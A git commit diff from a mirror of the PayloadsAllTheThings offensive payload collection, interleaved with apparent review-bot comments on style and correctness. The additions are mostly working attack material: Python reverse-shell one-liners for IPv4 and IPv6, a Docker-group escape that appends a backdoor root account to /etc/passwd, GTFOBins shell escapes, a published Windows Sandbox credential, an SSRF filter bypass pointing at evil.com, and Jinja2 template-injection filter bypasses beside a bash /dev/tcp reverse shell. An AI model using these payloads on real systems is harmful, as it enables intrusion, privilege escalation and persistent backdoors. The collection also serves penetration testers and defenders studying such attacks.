mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Shell IPv6 + Sandbox credential
This commit is contained in:
parent
8b39647de6
commit
2e3aef1a19
1
.gitignore
vendored
@ -1,3 +1,4 @@
|
|||||||
BuildPDF/
|
BuildPDF/
|
||||||
.vscode
|
.vscode
|
||||||
.todo
|
.todo
|
||||||
|
AWS Amazon Lambda/
|
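Review bot: the new `.gitignore` entry `AWS Amazon Lambda/` ignores a content directory, whereas the existing entries `BuildPDF/`, `.vscode` and `.todo` are build output and editor files; if that folder is meant to be published it should be tracked, and if it is scratch material a comment saying so would save the next contributor from wondering why it never appears in the repository.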
@ -39,6 +39,7 @@
|
|||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
./bloodhound
|
./bloodhound
|
||||||
SharpHound.exe (from resources/Ingestor)
|
SharpHound.exe (from resources/Ingestor)
|
||||||
|
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
|
||||||
or
|
or
|
||||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||||
```
|
```
|
||||||
|
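Review bot: the added `SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100` hard-codes a lab domain and address where the rest of the repository uses bracketed placeholders (compare `[IPADDR]:[PORT]` in the reverse-shell hunk of this same commit); use something like `[DOMAIN]` and `[DC_IP]` so readers do not copy lab values. While in this block, the context line `user:neo4J` has a stray capital J and should read `neo4j`, matching the password on the same line.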
@ -8,6 +8,7 @@
|
|||||||
```
|
```
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
|
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
|
||||||
|
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
|
||||||
|
|
||||||
## Checklists
|
## Checklists
|
||||||
|
|
||||||
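Review bot: the new link text `unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check` is the GitHub import note, not a description of the tool; the neighbouring entries (`BeRoot - Privilege Escalation Project ...`, `linuxprivchecker.py - a Linux Privilege Escalation Check Script`) each say what the tool does, and the Windows counterpart added in this same commit reads `windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems`; mirror that wording here.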
@ -82,6 +83,28 @@
|
|||||||
* Checks to see if the host has Docker installed
|
* Checks to see if the host has Docker installed
|
||||||
* Checks to determine if we're in an LXC container
|
* Checks to determine if we're in an LXC container
|
||||||
|
|
||||||
|
## GTFOBins
|
||||||
|
|
||||||
|
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||||
|
|
||||||
|
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
|
||||||
|
|
||||||
|
> gdb -nx -ex '!sh' -ex quit
|
||||||
|
> sudo mysql -e '\! /bin/sh'
|
||||||
|
> strace -o /dev/null /bin/sh
|
||||||
|
|
||||||
|
## Groups
|
||||||
|
|
||||||
|
### Docker
|
||||||
|
|
||||||
|
Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$> docker run -it --rm -v $PWD:/mnt bash
|
||||||
|
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- []()
|
- []()
|
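Review bot: the `## References` block added here ends with an empty entry `- []()`, which renders as a bare dash; either fill in the GTFOBins and Docker sources or leave the section out until there is something to cite. In the GTFOBins paragraph, `get the f**k break out restricted shells` is two phrases run together and should read `break out of restricted shells`, and `facilitate the other post-exploitation tasks` should drop `the`. The three GTFOBins commands are given as `>` block quotes while every other command on these pages sits in a fenced ```bash block; use the fence for consistency. Lastly, the Docker prose says `Mount the filesystem` but the command mounts `$PWD`; state which directory the reader is expected to be in so the prose and the command agree.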
@ -36,10 +36,16 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
|
|||||||
|
|
||||||
Linux only
|
Linux only
|
||||||
|
|
||||||
|
IPv4
|
||||||
```python
|
```python
|
||||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
IPv6
|
||||||
|
```python
|
||||||
|
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||||||
|
```
|
||||||
|
|
||||||
```python
|
```python
|
||||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||||
```
|
```
|
||||||
|
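Review bot: in the new IPv6 one-liner the connect tuple `("dead:beef:2::125c",4343,0,2)` hard-codes a scope id of `2` as its fourth element; that value is the index of a network interface on the host where the command runs, so it belongs behind a placeholder with a one-line explanation, otherwise the example fails wherever the interface numbering differs. The three blocks now use `127.0.0.1:4444`, `dead:beef:2::125c:4343` and `10.0.0.1:1234` for the same listener; the page's own convention is `[IPADDR]:[PORT]` (see the perl line in the hunk header), so apply it throughout. The IPv6 variant also imports `subprocess` without using it.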
@ -6,6 +6,7 @@
|
|||||||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
||||||
|
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
|
||||||
|
|
||||||
## Windows Version and Configuration
|
## Windows Version and Configuration
|
||||||
|
|
||||||
|
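Review bot: the new sentence `Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard` has no antecedent for `it`; name the account (`The WDAGUtilityAccount ...`) so the tip stands on its own. The block is fenced as ```powershell but contains a UNC path and two `Username:`/`Password:` lines, none of which is PowerShell; an untagged fence, as used for the `Password: trs10` block above, avoids misleading highlighting. Embedding the Twitter link in the `##` heading also produces an unwieldy anchor; keep the heading short and put the attribution on the line below it.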
@ -23,6 +23,17 @@ Username: RetailAdmin
|
|||||||
Password: trs10
|
Password: trs10
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
|
||||||
|
|
||||||
|
Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
\\windowssandbox
|
||||||
|
Username: wdagutilityaccount
|
||||||
|
Password: pw123
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Metasploit - SMB
|
## Metasploit - SMB
|
||||||
|
|
||||||
```c
|
```c
|
||||||
|
@ -159,6 +159,12 @@ List:
|
|||||||
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass filter_var() php function
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
0://evil.com:80;http://google.com:80/
|
||||||
|
```
|
||||||
|
|
||||||
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
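Review bot: `Bypass filter_var() php function` does not say which validation flag or PHP version the `0://evil.com:80;http://google.com:80/` payload targets, and unlike the Orange Tsai item directly below it carries no source link; add the reference the payload came from so a reader can verify the claim. The block is fenced as ```powershell for what is a URL string (the surrounding blocks do the same), so if this file's fence tags are being touched, a neutral tag would be more accurate. The payload also uses the real domains `evil.com` and `google.com` where placeholders would do.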
@ -1,6 +1,42 @@
|
|||||||
# Templates Injections
|
# Templates Injections
|
||||||
|
|
||||||
> Template injection allows an attacker to include template code into an existant (or not) template.
|
> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Methodology](#methodology)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [List files and directories](#list-files-and-directories)
|
||||||
|
* [Java](#java)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Code execution](#code-execution)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Jade / Codepen](#jade---codepen)
|
||||||
|
* [Velocity](#velocity)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Jinja2](#jinja2)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Dump all used classes](#dump-all-used-classes)
|
||||||
|
* [Dump all config variables](#dump-all-config-variables)
|
||||||
|
* [Read remote file](#read-remote-file)
|
||||||
|
* [Write into remote file](#write-into-remote-file)
|
||||||
|
* [Remote Code Execution](#remote-code-execution)
|
||||||
|
* [Filter bypass](filter-bypass)
|
||||||
|
* [Jinjava](#jinjava)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Command execution](#command-execution)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||||
e.g:
|
e.g:
|
||||||
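Review bot: the new Summary repeats `#basic-injection` for Ruby, Java, Twig, Jinja2 and Jinjava, and `#retrieve--etc-passwd` for Ruby and Java; GitHub de-duplicates identical headings by appending `-1`, `-2`, ... to the slug, so every one of those entries will jump to the first section carrying that title. Either keep the engine prefix in the headings (the `Java - Basic injection` form this commit removes) or point the links at the suffixed slugs. Two entries, `(retrieve-the-system-s-environment-variables)` and `(filter-bypass)`, lack the leading `#` and will be resolved as relative paths. The title `# Templates Injections` should be singular, `# Template Injection`, and `existant` in the quoted definition is `existing`.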
@ -37,7 +73,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
|
|||||||
|
|
||||||
## Java
|
## Java
|
||||||
|
|
||||||
### Java - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${7*7}
|
${7*7}
|
||||||
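Review bot: renaming `### Java - Basic injection` to `### Basic injection` yields a heading that already exists under Ruby and, after this commit, under Twig, Jinja2 and Jinjava as well; the duplicate slugs break the Summary links and make the headings meaningless in search results or a TOC widget. Keep the engine name in the heading, or at minimum make the Summary point to the correct `-N` suffixed anchor.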
@ -47,13 +83,13 @@ ${class.getResource("").getPath()}
|
|||||||
${class.getResource("../../../../../index.htm").getContent()}
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve the system’s environment variables
|
### Retrieve the system’s environment variables
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${T(java.lang.System).getenv()}
|
${T(java.lang.System).getenv()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve /etc/passwd
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
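Review bot: the context line `${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}` is missing the leading slash in `etc/passwd`, so the example does not match the heading `Retrieve /etc/passwd`; since the heading is being rewritten in this hunk, correct the path in the same change.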
@ -63,14 +99,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
|
|||||||
|
|
||||||
## Twig
|
## Twig
|
||||||
|
|
||||||
### Twig - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{7*7}}
|
{{7*7}}
|
||||||
{{7*'7'}} would result in 49
|
{{7*'7'}} would result in 49
|
||||||
```
|
```
|
||||||
|
|
||||||
### Twig - Template format
|
### Template format
|
||||||
|
|
||||||
```python
|
```python
|
||||||
$output = $twig > render (
|
$output = $twig > render (
|
||||||
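Review bot: the context line `$output = $twig > render (` has a mangled arrow; Twig's PHP API is `$twig->render(`, and with a bare `>` the snippet is a syntax error. The Twig blocks are fenced as ```python although the template syntax is Twig and the surrounding code is PHP, so `twig` or `php` would highlight correctly. `{{7*'7'}} would result in 49` is a prose remark inside a code fence; move it out or mark it as a comment.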
@ -84,7 +120,7 @@ $output = $twig > render (
|
|||||||
);
|
);
|
||||||
```
|
```
|
||||||
|
|
||||||
### Twig - Code execution
|
### Code execution
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{self}}
|
{{self}}
|
||||||
@ -145,7 +181,7 @@ ${x}
|
|||||||
[Official website](http://jinja.pocoo.org/)
|
[Official website](http://jinja.pocoo.org/)
|
||||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
### Jinja2 - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{4*4}}[[5*5]]
|
{{4*4}}[[5*5]]
|
||||||
@ -155,7 +191,7 @@ ${x}
|
|||||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||||
The above injections have been tested on Flask application.
|
The above injections have been tested on Flask application.
|
||||||
|
|
||||||
### Jinja2 - Template format
|
### Template format
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{% extends "layout.html" %}
|
{% extends "layout.html" %}
|
||||||
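Review bot: `Jinja2 is used by Python Web Frameworks such as Django or Flask` overstates Django, which ships its own template language and supports Jinja2 only as an optional backend, whereas Flask uses Jinja2 by default; `such as Flask (and optionally Django)` is accurate. `tested on Flask application` needs an article: `on a Flask application`.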
@ -169,7 +205,7 @@ The above injections have been tested on Flask application.
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Dump all used classes
|
### Dump all used classes
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ [].class.base.subclasses() }}
|
{{ [].class.base.subclasses() }}
|
||||||
@ -177,7 +213,7 @@ The above injections have been tested on Flask application.
|
|||||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Dump all config variables
|
### Dump all config variables
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{% for key, value in config.iteritems() %}
|
{% for key, value in config.iteritems() %}
|
||||||
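Review bot: `config.iteritems()` in the context line is Python 2 only; on Python 3 `dict.iteritems` does not exist and the loop raises. The `__mro__[2]` payloads on this page are likewise Python 2 specific (`''.__class__.__mro__` has only two entries on Python 3), so the page should state which interpreter version the examples were tested against.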
@ -186,20 +222,20 @@ The above injections have been tested on Flask application.
|
|||||||
{% endfor %}
|
{% endfor %}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Read remote file
|
### Read remote file
|
||||||
|
|
||||||
```python
|
```python
|
||||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Write into remote file
|
### Write into remote file
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Remote Code Execution via reverse shell
|
### Remote Code Execution
|
||||||
|
|
||||||
Listen for connexion
|
Listen for connexion
|
||||||
|
|
||||||
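Review bot: the comment `''.__class__.__mro__[2].__subclasses__()[40] = File class` pins an index that depends on the interpreter version and on what the process has imported; the comment should say the index is environment-specific rather than present `40` as a constant. The heading rename drops `via reverse shell`, yet the section body still describes exactly that (`Listen for connexion`, `bash -i >& /dev/tcp/...`), so the shorter title loses information; `connexion` should be `connection`.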
@ -215,10 +251,42 @@ Inject this template
|
|||||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Filter bypass
|
||||||
|
|
||||||
|
```python
|
||||||
|
request.__class__
|
||||||
|
request["__class__"]
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `_`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
|
||||||
|
|
||||||
|
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||||
|
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||||
|
{{request|attr(["__","class","__"]|join)}}
|
||||||
|
{{request|attr("__class__")}}
|
||||||
|
{{request.__class__}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `[` and `]`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
|
||||||
|
or
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `|join`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
|
```
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
### Jinjava - Basic injection
|
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{'a'.toUpperCase()}} would result in 'A'
|
{{'a'.toUpperCase()}} would result in 'A'
|
||||||
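Review bot: the new `### Filter bypass` section cites no source, while this same commit adds the reference `Jinja2 template injection filter bypasses - @gehaxelt, @0daywork`, which covers this topic; if that is where the payloads come from, cite it at the top of the section. The three blocks are fenced as ```python but contain full URLs (`http://localhost:5000/?exploit=...`) mixed with template fragments and the bare word `or`; separate the URLs from the template expressions and move `or` out of the fence. The hunk also removes the blank line after `### Jinjava - Basic injection` but leaves one after the replacement `### Basic injection`, so heading spacing no longer matches the rest of the file.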
@ -227,7 +295,7 @@ Inject this template
|
|||||||
|
|
||||||
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
||||||
|
|
||||||
### Jinjava - Command execution
|
### Command execution
|
||||||
|
|
||||||
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
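Review bot: `developped` in the context line is misspelled (`developed`). `Fixed by https://github.com/HubSpot/jinjava/pull/230` is a bare URL where the page otherwise uses Markdown links, and a fix note is more useful if it also names the first released version containing the fix rather than only the pull request.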
@ -242,20 +310,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Client Side Template Injection
|
|
||||||
|
|
||||||
### AngularJS
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
$eval('1+1')
|
|
||||||
{{1+1}}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Vue JS
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
{{constructor.constructor('alert(1)')()}}
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
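Review bot: this hunk deletes the whole `## Client Side Template Injection` section (AngularJS and Vue JS), but the only replacement is the sentence added to the XSS in Angular page, and the Vue JS payload `{{constructor.constructor('alert(1)')()}}` disappears entirely; either move the Vue example together with the Angular one or keep a short pointer here (`See [XSS in Angular](...)`) so readers of the Template Injection page can still find the client-side material.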
@ -268,3 +322,6 @@ $eval('1+1')
|
|||||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
||||||
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
||||||
|
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
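Review bot: the new reference `EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018` is in all caps and uses `BY:`, while the entries around it follow `Title - Author - Date`; normalise it to `Exploiting Server Side Template Injection with Tplmap - Divine Selorm Tsa - 18 Aug 2018`.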
@ -1,5 +1,7 @@
|
|||||||
# XSS in Angular
|
# XSS in Angular
|
||||||
|
|
||||||
|
The following payloads are based on Client Side Template Injection.
|
||||||
|
|
||||||
## Stored/Reflected XSS - Simple alert
|
## Stored/Reflected XSS - Simple alert
|
||||||
|
|
||||||
> Angular as of version 1.6 have removed the sandbox altogether
|
